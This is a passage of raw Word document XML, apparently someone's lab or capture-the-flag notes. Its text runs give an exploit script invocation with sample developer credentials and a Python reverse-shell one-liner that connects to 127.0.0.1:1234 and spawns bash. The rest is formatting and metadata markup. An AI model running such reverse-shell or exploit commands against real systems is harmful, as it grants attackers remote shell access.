      <w:r w:rsidRPr="00596BE6">
        <w:t xml:space="preserve">/ -u </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user_email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00596BE6">
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBE4F8F" w14:textId="77777777" w:rsidR="00D70B66" w:rsidRDefault="00D70B66" w:rsidP="00265E25"/>
    <w:p w14:paraId="0D59E14A" w14:textId="5427168A" w:rsidR="00596BE6" w:rsidRDefault="00596BE6" w:rsidP="00265E25">
      <w:r w:rsidRPr="00596BE6">
        <w:t>python2 exploit.py -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00596BE6">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00596BE6">
        <w:t xml:space="preserve"> http://</w:t>
      </w:r>
      <w:r w:rsidR="00D70B66">
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00596BE6">
        <w:t>/ -u developer_1@localhost.com -p developer_</w:t>
      </w:r>
      <w:r w:rsidR="0088349C">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A987F00" w14:textId="474D1F28" w:rsidR="008A6588" w:rsidRDefault="008A6588" w:rsidP="00265E25"/>
    <w:p w14:paraId="74B11A9E" w14:textId="787C59F1" w:rsidR="008A6588" w:rsidRPr="00265E25" w:rsidRDefault="008A6588" w:rsidP="00265E25">
      <w:r w:rsidRPr="008A6588">
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A6588">
        <w:t>os,pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A6588">
        <w:t>,socket;s=socket.socket();s.connect(("127.0.0.1",1234));[os.dup2(s.fileno(),f)for f in(0,1,2)];</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A6588">
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A6588">
        <w:t>("</w:t>
      </w:r>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6588">
        <w:t>")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F019B6C" w14:textId="77777777" w:rsidR="00265E25" w:rsidRPr="00265E25" w:rsidRDefault="00265E25" w:rsidP="00265E25"/>
    <w:p w14:paraId="2F96B844" w14:textId="4427D9C7" w:rsidR="000B0814" w:rsidRDefault="000B0814" w:rsidP="00CB06E1"/>
    <w:sectPr w:rsidR="000B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F35"/>
    <w:rsid w:val="00002DA3"/>
    <w:rsid w:val="00010457"/>
    <w:rsid w:val="000B0814"/>
    <w:rsid w:val="000C7BCF"/>
    <w:rsid w:val="000D2BB6"/>
    <w:rsid w:val="000D5ADC"/>
    <w:rsid w:val="00136652"/>
    <w:rsid w:val="001B27EE"/>
    <w:rsid w:val="001B3655"/>
    <w:rsid w:val="001B45CA"/>
    <w:rsid w:val="001C3321"/>
    <w:rsid w:val="00265E25"/>
    <w:rsid w:val="002D2F5E"/>
    <w:rsid w:val="003070AC"/>
    <w:rsid w:val="00357C6F"/>
    <w:rsid w:val="003B0FA4"/>
    <w:rsid w:val="003D1708"/>
    <w:rsid w:val="0045515B"/>
    <w:rsid w:val="004E6F9F"/>
    <w:rsid w:val="004F7526"/>
    <w:rsid w:val="00535DCF"/>
    <w:rsid w:val="00550075"/>
    <w:rsid w:val="00561389"/>
    <w:rsid w:val="00596BE6"/>
    <w:rsid w:val="005C1A07"/>
    <w:rsid w:val="005C3B30"/>
    <w:rsid w:val="005F6301"/>
    <w:rsid w:val="006567B7"/>
    <w:rsid w:val="00657CF2"/>
    <w:rsid w:val="0067463D"/>
    <w:rsid w:val="006E7045"/>
    <w:rsid w:val="0072638B"/>
    <w:rsid w:val="007C4850"/>
    <w:rsid w:val="00811EE3"/>
    <w:rsid w:val="00837A73"/>
    <w:rsid w:val="0085592A"/>
    <w:rsid w:val="008562F0"/>
    <w:rsid w:val="0088349C"/>
    <w:rsid w:val="008A6588"/>
    <w:rsid w:val="008B1F35"/>
    <w:rsid w:val="008E0104"/>
    <w:rsid w:val="00921BA5"/>
    <w:rsid w:val="00970797"/>
    <w:rsid w:val="009B6183"/>
    <w:rsid w:val="009C4B23"/>
    <w:rsid w:val="009C4D7E"/>
    <w:rsid w:val="00A04782"/>
    <w:rsid w:val="00A15ED1"/>
    <w:rsid w:val="00A3162A"/>
    <w:rsid w:val="00A54C1C"/>
    <w:rsid w:val="00AF3478"/>
    <w:rsid w:val="00AF7D18"/>
    <w:rsid w:val="00B21EEA"/>
    <w:rsid w:val="00B334DC"/>
    <w:rsid w:val="00B45C5F"/>
    <w:rsid w:val="00B77C2E"/>
    <w:rsid w:val="00BA18BB"/>
    <w:rsid w:val="00BF2925"/>
    <w:rsid w:val="00C346E9"/>
    <w:rsid w:val="00C57E4A"/>
    <w:rsid w:val="00C82D0E"/>
    <w:rsid w:val="00CB06E1"/>
    <w:rsid w:val="00CF3952"/>
    <w:rsid w:val="00D70B66"/>
    <w:rsid w:val="00DA458C"/>
    <w:rsid w:val="00DA50C3"/>
    <w:rsid w:val="00E85885"/>
    <w:rsid w:val="00EB2BFA"/>
    <w:rsid w:val="00EB5CD5"/>
    <w:rsid w:val="00EE3DC2"/>
    <w:rsid w:val="00F072E2"/>
    <w:rsid w:val="00F16048"/>
    <w:rsid w:val="00F16689"/>
    <w:rsid w:val="00F71E87"/>
    <w:rsid w:val="00F76C20"/>
    <w:rsid w:val="00F779D0"/>
    <w:rsid w:val="00F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2516"/>
  <w15:docId w15:val="{F886503C-9343-467F-859A-307E932D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CD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localhost.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.8.150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34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-14T12:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-16T15:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>